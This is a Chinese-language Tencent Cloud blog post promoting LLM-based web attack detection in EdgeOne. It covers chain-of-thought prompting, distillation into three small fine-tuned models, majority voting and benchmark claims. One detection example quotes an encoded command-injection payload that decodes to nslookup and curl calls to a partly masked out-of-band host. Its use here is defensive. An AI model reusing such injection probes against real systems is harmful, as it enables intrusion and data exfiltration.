當(dāng)漏洞攻擊遇上騰訊混元超能力：EdgeOne的Web安全賽博決斗

《騰訊云2024年DDoS與應(yīng)用安全威脅趨勢(shì)報(bào)告》顯示，利用漏洞和應(yīng)用弱點(diǎn)的攻擊手段愈發(fā)多樣化和復(fù)雜化，2024年高危漏洞攻擊總量超過(guò) 17億次，面對(duì)這一嚴(yán)峻挑戰(zhàn)，我們應(yīng)該如何應(yīng)對(duì)？接下來(lái)將為您講解我們的最新嘗試——基于大模型的漏洞識(shí)別能力，您可以通過(guò)托管規(guī)則-深度分析功能，率先體驗(yàn)EdgeOne對(duì)漏洞的識(shí)別能力。

網(wǎng)絡(luò)安全新威脅：漏洞攻擊的雙重挑戰(zhàn)

當(dāng)前，網(wǎng)絡(luò)安全面臨著前所未有的挑戰(zhàn)，尤其是在漏洞攻擊頻發(fā)的背景下。想象一下，在某個(gè)電商大促期間，黑客通過(guò)巧妙的SQL語(yǔ)句悄無(wú)聲息地盜取用戶數(shù)據(jù)，或者利用惡意腳本偽裝成正常請(qǐng)求，在海量合法流量中發(fā)動(dòng)攻擊，隨時(shí)可能給企業(yè)帶來(lái)數(shù)據(jù)泄露和業(yè)務(wù)中斷的風(fēng)險(xiǎn)。

為了應(yīng)對(duì)這些威脅，EdgeOne的Web流量攻擊檢測(cè)系統(tǒng)能夠有效過(guò)濾和攔截惡意漏洞攻擊流量，避免入侵和數(shù)據(jù)泄露風(fēng)險(xiǎn)。然而，隨著攻擊手段的不斷升級(jí)，傳統(tǒng)的防御體系面臨著漏報(bào)和誤報(bào)的雙重困境：

●  專家規(guī)則雖然能快速識(shí)別已知攻擊，但對(duì)新型攻擊束手無(wú)策；

●  語(yǔ)義分析雖然準(zhǔn)確性高，但在處理海量請(qǐng)求時(shí)速度較慢；

●  傳統(tǒng)機(jī)器學(xué)習(xí)雖然具備自適應(yīng)能力，但對(duì)數(shù)據(jù)的依賴使其在實(shí)際應(yīng)用中受到限制。

在這樣的背景下，如何提高檢測(cè)的準(zhǔn)確性成為了我們關(guān)注的焦點(diǎn)。大模型的出現(xiàn)為這一問(wèn)題提供了新的解決方案。

大模型在流量分析中的應(yīng)用：從基礎(chǔ)知識(shí)到深度分析

大模型通過(guò)預(yù)訓(xùn)練學(xué)習(xí)安全基礎(chǔ)知識(shí)、HTTP流量中的代碼邏輯、協(xié)議行為與攻擊模式，構(gòu)建多層知識(shí)關(guān)聯(lián)分析，真正理解流量行為，提高檢測(cè)準(zhǔn)確性。例如，解析SQL注入時(shí)不僅識(shí)別SELECT FROM或UNION SELECT等關(guān)鍵詞，還能判斷其是否構(gòu)成閉合查詢、是否破壞業(yè)務(wù)邏輯。

從下面兩個(gè)例子就可以看到大模型具備對(duì)流量?jī)?nèi)容進(jìn)行深度分析和理解的能力，實(shí)現(xiàn)從“語(yǔ)法合規(guī)性”到“意圖危害性”理解的躍遷。

場(chǎng)景1：真假美猴王之辯，正常sql語(yǔ)句查詢識(shí)別，避免傳統(tǒng)靜態(tài)規(guī)則匹配易誤報(bào)問(wèn)題。

傳統(tǒng)檢測(cè)：看到SQL關(guān)鍵詞立即報(bào)警

LLM 偵探視角：

1️⃣檢查請(qǐng)求上下文：理解語(yǔ)義為合法業(yè)務(wù)查詢接口

2️⃣ 行為模式分析：沒(méi)有出現(xiàn)特殊字符構(gòu)造注入

⚠️ 結(jié)論：這是業(yè)務(wù)后臺(tái)的正常商品查詢！

場(chǎng)景2：密碼本的秘密，對(duì)加密內(nèi)容自動(dòng)解密分析，并進(jìn)行意圖分析，準(zhǔn)確識(shí)別到攻擊。

加密流量：

keyword=fChuc2xvb2t1cCR7SUZTfS1xJHtJRIN9Y25hbWUke0IGU31oaXRnaXFtZnZnc3drZDc4NjQu...

LLM 偵探破案過(guò)程：

🔍第一步：發(fā)現(xiàn)加密內(nèi)容，解碼發(fā)現(xiàn)命令組合

nslookup cname ***********.bxss.me

curl ***********.bxss.me

💡關(guān)鍵洞察：域名解析指向惡意IP，curl指令發(fā)送請(qǐng)求

🚨 結(jié)論：這是一起惡意攻擊！

大模型優(yōu)化與多模型協(xié)作：提升網(wǎng)絡(luò)攻擊檢測(cè)的效率與準(zhǔn)確性

那如何將大模型應(yīng)用到EdgeOne中呢？接下來(lái)將介紹我們?cè)诼涞貙?shí)踐中遇到的問(wèn)題和解決思路。

思維鏈CoT訓(xùn)練法：借鑒CoT的prompt調(diào)優(yōu)提升攻擊識(shí)別能力 

由于http流量攻擊內(nèi)容可能出現(xiàn)在流量中各個(gè)字段內(nèi)，并進(jìn)行編碼加密等操作隱藏攻擊，簡(jiǎn)單的prompt指令，模型可能分析不足導(dǎo)致漏檢。

在prompt調(diào)優(yōu)過(guò)程中，借鑒CoT思維鏈思路，根據(jù)現(xiàn)網(wǎng)攻擊流量特征，給出判定一個(gè)請(qǐng)求是否是Web攻擊的分析過(guò)程，引導(dǎo)大模型按照步驟逐步分析，最終確認(rèn)結(jié)果，就像福爾摩斯通過(guò)案件細(xì)節(jié)一步步推理得到最終真相！

場(chǎng)景CASE：攻擊者試圖探測(cè)源站是否存在源碼壓縮包的攻擊行為識(shí)別

大模型瘦身計(jì)劃：微調(diào)小參數(shù)模型提升檢測(cè)效率

隨著EdgeOne客戶流量規(guī)模激增，大參數(shù)模型因計(jì)算復(fù)雜度高、推理延遲大，難以滿足高效檢測(cè)需求。通過(guò)領(lǐng)域知識(shí)蒸餾，可將大模型能力遷移至小參數(shù)模型。

小參數(shù)模型所需的資源成本更低，處理性能更快。但是通過(guò)對(duì)比評(píng)測(cè)，小參數(shù)模型在攻擊樣本的檢出和白樣本識(shí)別準(zhǔn)確性均弱于大參數(shù)模型，通過(guò)蒸餾大參數(shù)模型的攻擊判定數(shù)據(jù)，微調(diào)小參數(shù)模型，在樣本集評(píng)測(cè)上達(dá)到接近大參數(shù)模型效果。

●  數(shù)據(jù)：7000條（包括多種攻擊類型樣本和白樣本）

●  基座模型：hunyuan-3b\qwen2.5-3b\llama3.2-3b

●  微調(diào)方式：lora

蒸餾大模型的微調(diào)數(shù)據(jù)樣例：（帶有分析過(guò)程內(nèi)容）

LLM偵探聯(lián)盟：多模型聯(lián)合投票

這里同時(shí)進(jìn)行了多個(gè)基座小模型的微調(diào)，包括hunyuan-3b，qwen2.5-3b，llama3.2-3b小參數(shù)模型，在測(cè)試樣本集攻擊檢出率和白樣本識(shí)別率方面，各有優(yōu)劣，通過(guò)分析差異樣本，騰訊混元模型在5個(gè)攻擊類型場(chǎng)景中的3個(gè)表現(xiàn)較優(yōu)，2個(gè)可以和其他模型互補(bǔ)，進(jìn)一步設(shè)計(jì)3個(gè)小模型聯(lián)合投票檢測(cè)方案，以提升整體檢測(cè)準(zhǔn)確率。

檢測(cè)邏輯：超過(guò)2個(gè)模型判為攻擊即攻擊，超過(guò)2個(gè)模型判為正常即正常。

➢在樣本集的評(píng)測(cè)效果如下：

經(jīng)過(guò)多模型取長(zhǎng)補(bǔ)短，整體攻擊檢測(cè)攻擊準(zhǔn)確率較單一模型有所提升，同時(shí)也達(dá)到接近大參數(shù)模型效果。

➢第三方工具blazehttp評(píng)測(cè)如下：

blazehttp（https://github.com/chaitin/blazehttp）為業(yè)界較知名的公開(kāi)的第三方測(cè)評(píng)Web流量攻擊檢測(cè)效果工具，總樣本33000+條，涵蓋各類攻擊和正常樣本。EdgeOne的漏洞防護(hù)嚴(yán)格模式準(zhǔn)確率超99%，誤報(bào)率僅為0.4%。

網(wǎng)絡(luò)安全的未來(lái)展望：從防御到智御

數(shù)字孿生沙盒

在真實(shí)環(huán)境之外構(gòu)建數(shù)字鏡像，AI在這里可以：

✅放心測(cè)試新規(guī)則

✅模擬攻擊演練

✅驗(yàn)證模型可靠性

在EdgeOne漏洞防護(hù)處于觀察模式階段的域名命中規(guī)則的請(qǐng)求進(jìn)行離線大模型判定，并提前自動(dòng)剔除不適合業(yè)務(wù)的策略，達(dá)到自適應(yīng)的效果，就像擁有一支永遠(yuǎn)不知疲倦的安全特種部隊(duì)！

0day獵殺計(jì)劃

結(jié)合RAG技術(shù)，實(shí)時(shí)關(guān)聯(lián)威脅情報(bào)與漏洞庫(kù)，流量特征識(shí)別0day攻擊。

流量特征 → 語(yǔ)義解析 → 威脅知識(shí)圖譜 → 全球攻擊樣本庫(kù) → 自動(dòng)生成防護(hù)策略

當(dāng)大模型遇上網(wǎng)絡(luò)安全，我們不僅造出了更聰明的檢測(cè)工具，更重新定義了防御的邊界。這場(chǎng)持續(xù)升級(jí)的攻防戰(zhàn)，正在見(jiàn)證 AI 如何從旁觀者變成守護(hù)者的蛻變歷程。在你安全瀏覽網(wǎng)頁(yè)的背后，或許正有看不見(jiàn)的 AI 偵探在為你守護(hù)安全！🛡️

EdgeOne標(biāo)準(zhǔn)版搶先體驗(yàn)，專屬活動(dòng)低至 4.5 折（1710 元/月起），您可以通過(guò)托管規(guī)則-深度分析功能，率先體驗(yàn)EdgeOne對(duì)漏洞的識(shí)別能力。而基于大模型的漏洞識(shí)別能力，正在緊鑼密鼓地規(guī)劃與開(kāi)發(fā)中，其將為漏洞檢測(cè)領(lǐng)域帶來(lái)革新性變化，敬請(qǐng)各位期待！